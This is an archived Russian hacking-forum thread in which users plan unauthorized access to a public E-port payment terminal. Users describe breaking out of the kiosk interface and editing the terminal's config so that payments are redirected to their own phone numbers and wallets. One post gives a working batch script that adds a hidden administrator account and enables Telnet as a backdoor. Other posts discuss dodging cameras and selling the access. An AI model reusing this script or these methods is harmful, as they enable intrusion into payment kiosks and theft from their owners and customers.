Просмотр полной версии : Терминал E-port
Доброго всем времени, сегодня удалось поиграть в косынку на терминале e-port :) пошарился по диску, залез в документы, ничего интересного не нашел, в программах нашел установленную программу e-port terminal (или что-то в этом роде). Подскажите, что и где можно найти интересного ,если есть доступ к терминалу??
да ничего не получится найти
winlogon.exe
04.11.2009, 13:50
Передавай пакеты с платежами на свой номер :D
mustang777
04.11.2009, 13:53
Как ты его похекал?
Можно в пм,пожалуйста.
[ Dumi ]
04.11.2009, 13:54
залей радмина для более удобного использования терминала.
Cthulchu
04.11.2009, 14:05
']залей радмина для более удобного использования терминала.
не выгорит, там неплохо фаерволы настроены. развечто тунелирование в icmp... но это бред.
не выгорит, там неплохо фаерволы настроены. развечто тунелирование в icmp... но это бред.
Может у их фаерволов истёк срок действия лицензионного соглашения? :D
Может у их фаерволов истёк срок действия лицензионного соглашения? :D
Мне кажется что там вообще нет фаерволов)) на этом терминале я часто замечал , что вылазиет ошибка: что-то про генерик хост... и тд (обычно на моей винде такая же фигня вылазила) несколько раз понажимал на эту ошибку, и потом пару раз нажал где меню пуск обычно на винде стоит, и в результате вылез пуск :)
']залей радмина для более удобного использования терминала.
ничего не выйдет, 90% терминалов подключены через жопорез, что исключает удаленное администратирование напрямую, как вариант поставить хамачи, но это палево
ничего не выйдет, 90% терминалов подключены через жопорез, что исключает удаленное администратирование напрямую, как вариант поставить хамачи, но это палево
Хм, но как туда залить?
mustang777
04.11.2009, 14:32
C флешки слей,что непонятного то?
C флешки слей,что непонятного то?
хз, а куда туда влеха втыкается? :D
StarFire
04.11.2009, 14:39
Хм, но как туда залить?
залей дома весь софт на rapidshare к примеру потом с терминала качай и ставь...
залей дома весь софт на rapidshare к примеру потом с терминала качай и ставь...
ну это уже норм идея)) только вот открыв браузер как туда ввести адрес?
Экранная клавиатура?
Экранная клавиатура?
клаву не искал, она в прогах установлена?
Pashkela
04.11.2009, 15:44
Пуск->Программы->Стандартные->Служебные->Таблица символов
СПАСИБО!
клаву не искал, она в прогах установлена?
Должна быть,хз. :confused:
Если GPRS то те нуно чтото с бэк конетком
X-RayBlade
04.11.2009, 15:50
как вариант подучить telnet ;)
Вот только лучше Пуск->Программы->Стандартные->Специальные возможности->Экранная клавиатура :D Вот только хз как изменить на eng
Вот только лучше Пуск->Программы->Стандартные->Специальные возможности->Экранная клавиатура :D Вот только хз как изменить на eng
У меня семёрка,там можно сначала нажать шифт,потом два раза alt. Попробуй.
У меня семёрка,там можно сначала нажать шифт,потом два раза alt. Попробуй.
Ага действует!)
Как вообще на терминале открыть меню пуск?
Как вообще на терминале открыть меню пуск?
Перечитай тему. Там вроде ТС говорил,как он смог "открыть меню пуск".
ТС, TeamViewer не пробовал ? Работает типа Радмина тока устанавливать не надо и подключение не по IP, тоесть разного рода роутеры обходит.
ТС, TeamViewer не пробовал ? Работает типа Радмина тока устанавливать не надо и подключение не по IP, тоесть разного рода роутеры обходит.
я вообще сомневаюсь что жпрс канал потянет графический режим удаленного администратирования, тут надо что то попроще
А.. ну вообще то да... значит остается ТЕЛНЕТ. И управлять можно, и графики нет
еси несекрет а как ты так беспалева получил доступ к терминалу и потом стоял и лазил в нем ?
ты случаем не работаешь в магазине где стоит этот терминал ?
еси несекрет а как ты так беспалева получил доступ к терминалу и потом стоял и лазил в нем ?
ты случаем не работаешь в магазине где стоит этот терминал ?
нет:) живу недалеко от общаги, где находится этот терминал ;)
запускай экранную клавиатуру-
C\Windows\System32\osk.exe
пишешь батник либо вручную открываешь порты для телнета, RDP и создаешь нового пользователя с паролем, скрыв выбор пользователя при загрузке винды (тело батника можешь на форуме найти, если сам не знаешь как написать).
Потом удаленно конектишься к терминалу и правишь конфиг файл (дада,тот самый), в папке, где установлена программа E-Port.
Q-Что тебе даст правка этого файла?
A-Все осуществляемые автоматом платежи будут поступать на указанные тобой мобильные номера и кошельки.
Ну а если ты мега хакер, и хочешь получить все и сразу, то можешь проснифать траф отправляемый автоматом на сервер, расшифровать его, и отправить подмененный.
На этом способе можно срубить больше чем на первом.
Дерзай )
FALTONICK
05.11.2009, 12:18
дабы не создавать еше тему!
кто знает как поставить терминал себе в магазин?
дабы не создавать еше тему!
кто знает как поставить терминал себе в магазин?
Купить терминал :)
Кстати как вкл telnet , cделать чтобы он автоматом вкл при загрузке, добавить пользователя (админа)? ну вообщем обьясните :rolleyes:
Кстати как вкл telnet , cделать чтобы он автоматом вкл при загрузке, добавить пользователя (админа)? ну вообщем обьясните
Тыкай сюда (http://forum.xakep.ru/m_1214940/tm.htm) тут вроде нормально все описано.
Тыкай сюда (http://forum.xakep.ru/m_1214940/tm.htm) тут вроде нормально все описано.
Спасибо сделал батник :) осталось залить) думаю лучше всего сделать прямую ссылку чтобы можно было выбрать "открыть" а не " сохранить" так как потом хз как его удалить:)
Спасибо сделал батник осталось залить) думаю лучше всего сделать прямую ссылку чтобы можно было выбрать "открыть" а не " сохранить" так как потом хз как его удалитьМм... всмысле ? Ты должен его на терминал скинуть и там уже запустить.. а удалиш... с дома :)
И еще, вот мне тоже интересно, там разве не стоят камеры ? Кагбы никто не заметит что ты на терминале чет не то делаеш ? ))
Мм... всмысле ? Ты должен его на терминал скинуть и там уже запустить.. а удалиш... с дома :)
И еще, вот мне тоже интересно, там разве не стоят камеры ? Кагбы никто не заметит что ты на терминале чет не то делаеш ? ))
ну в браузере (explorer) введу ссылку типа xxx.narod.ru/telnet.bat и он сразу предложит мне " запустить" .
Насчет камер:они есть, но рядом с терминалом не замечал, потому нужно действовать как минимум двоим :)
Слух, чет я не подумал.. а как ты подключаться будеш ? У тебя IP его есть ?
mandalina
05.11.2009, 13:33
Снифер став
Ссылка (https://forum.antichat.ru/threadnav84364-1-10.html)
Но это уже посложнее будет
Слух, чет я не подумал.. а как ты подключаться будеш ? У тебя IP его есть ?
а разве нельзя узнать его ip :)
Кстати насчет того батника, никак не пойму зачем удалять админа, ведь после перезагрузки потребуется ввести логин и пароль, или я чего-то не пойму, терминал же не сможет загрузиться?
Испытал на себе:( кто знает как восстановить учетную запись?
Нафига удалять админа я не знаю... вот лучше такой батник сделай
chcp 1251
net user hacker hack /add
net localgroup Администраторы hacker /add
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t" /v hacker /t REG_Dword /d 0 /f
net start Telnet
По идее должно работать. ПРоверь на себе )
Нафига удалять админа я не знаю... вот лучше такой батник сделай
chcp 1251
net user hacker hack /add
net localgroup Администраторы hacker /add
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t" /v hacker /t REG_Dword /d 0 /f
net start Telnet
По идее должно работать. ПРоверь на себе )
Ну да поидее должно так :) а как мне теперь восстановить админа, если также в батнике создать то имя которое было . то проканает?
Проверил на себе : работает :)
Да, но если не получится то можно по-другому. Можно создать нового пользователя, к примеру "anti4at" и просто всё что в папке Documents and settig\Admin скопировать в папку Documents and setting\anti4at
Проверил на себе : работаетТеперь думай как узнать из дома его IP
Да, но если не получится то можно по-другому. Можно создать нового пользователя, к примеру "anti4at" и просто всё что в папке Documents and settig\Admin скопировать в папку Documents and setting\anti4at
так вот я пытаюсь зайти в Documents and settig\Admin а мне пишет нет доступа к Documents and settig\Admin , отказано в доступе :eek:
Ололо.... LiveCD есть ? Если есть - грузись с него и копируй. Или... зайди в мой компьютер--сервис--свойства папки--вид там убери галочку " использовать простой доступ к фаилам и папкам "
Потом иди в Documents and settig там жми правой кнопкой на папке Admin свойства--безопасность и разреши все действия всем пользователям :)
Silly.worm
05.11.2009, 16:56
Huster Прости, а как он загрузится с liveCD???
ТС, тут на форуме есть (https://forum.antichat.ru/showthread.php?t=152318) тема про создание пользователя, и все нужные скрипты. И совет, если плохо представляешь себе работу теремка и не совсем уверен в том что делаешь, лучше настрой удаленный доступ, любым из разобранных и предложенных тебе способов. А потом попробуй его продать.
Huster Прости, а как он загрузится с liveCD???ОН как бы у себя на компе запустил и тер пытается восстановть Админа.
Silly.worm
05.11.2009, 19:20
Наверное я туплю, но мне казалось, что это все на тереме а не на домашней тачке.
ТС, а можно в ПМ как доступ получил?
Наверное я туплю, но мне казалось, что это все на тереме а не на домашней тачке.
ТС, а можно в ПМ как доступ получил?
В теме написано :cool:
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot